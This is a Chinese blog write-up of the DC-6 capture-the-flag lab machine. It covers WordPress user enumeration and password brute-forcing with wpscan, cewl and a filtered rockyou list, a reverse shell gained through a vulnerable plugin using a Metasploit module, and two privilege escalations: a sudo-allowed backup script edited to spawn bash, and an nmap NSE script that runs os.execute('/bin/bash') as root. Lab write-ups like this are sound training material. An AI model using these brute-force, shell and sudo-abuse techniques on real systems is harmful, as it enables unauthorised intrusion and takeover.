DC-5关卡存了稿,但是不知道为什么再打开靶机继续写的时候日志文件怎么都读取不到,尝试了重装,还是不行,暂时还不知道到底毛病出在哪里······只好先放下这关,先做第六关吧。
扫描出来直接访问网站。‘
是个WorldPress。这里有个坑,前几关把IP放在hosts里面,注释写什么都可以,但是这关必须加上wordy,否则访问会出问题。
wpscan --url http://wordy --enumerate vp --enumerate vt --enumerate u
Wpscan扫描一波。
扫出来五个用户。
看看默认后台,确实存在。
cewl -w dc6pwd,txt http://wordy/
利用cewl生成个字典
跟用户名枚举。
wpscan --url http://wordy/ -U dc6users.txt -P dc6pwd.txt
啥情况,一个都没爆到。
又研究半天,感觉方向应该没错。
上官网查了查DC-6,发现作者有一段提示。
OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ?
原来路径里面内置了一个压缩包。
解压下来。
根据提示。
cat rockyou.txt | grep k01 > k01.txt
然后再爆破密码,结果成功爆到一个密码。
然后去后台登陆。
在users里面看到可以增加新用户。
起初的想法是增加一个用户,但是好像没什么用。
再继续找。
这里比较可疑,显示了IP HooK等信息。神器msf搜一下这个插件看看。
有三个可利用的模块。用第三个html。
给了详细的信息。通过替换ip、端口可以反弹shell。
在Tools选项,IP随便填,然后Loolup抓包,修改填入的IP处。
已经连接到Shell。
python -c "import pty;pty.spawn('/bin/bash')"
获得交互式Shell。
然后就是翻目录了。
在home/mark/stuff目录下发现一个txt文件,查看。
看到了一个新的用户名密码。SSH登陆。
成功登陆。
sudo -l看看。
然后vi模式把解压命令删除,(vi命令使用方法去百度,vim和vi不是一个调用)留下/bin/bash。以jens用户执行。
sudo -u jens /home/jens/backups.sh PS
直接登陆了jens用户,再sudo -l
看到jens用户可以在无需输入密码的情况下使用nmap。
echo "os.execute('/bin/bash')" > root.nse
sudo nmap --script=/home/jens/root.nse
先写个nse脚本,再执行。
成功提权为root。最后在root目录下找到flag。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。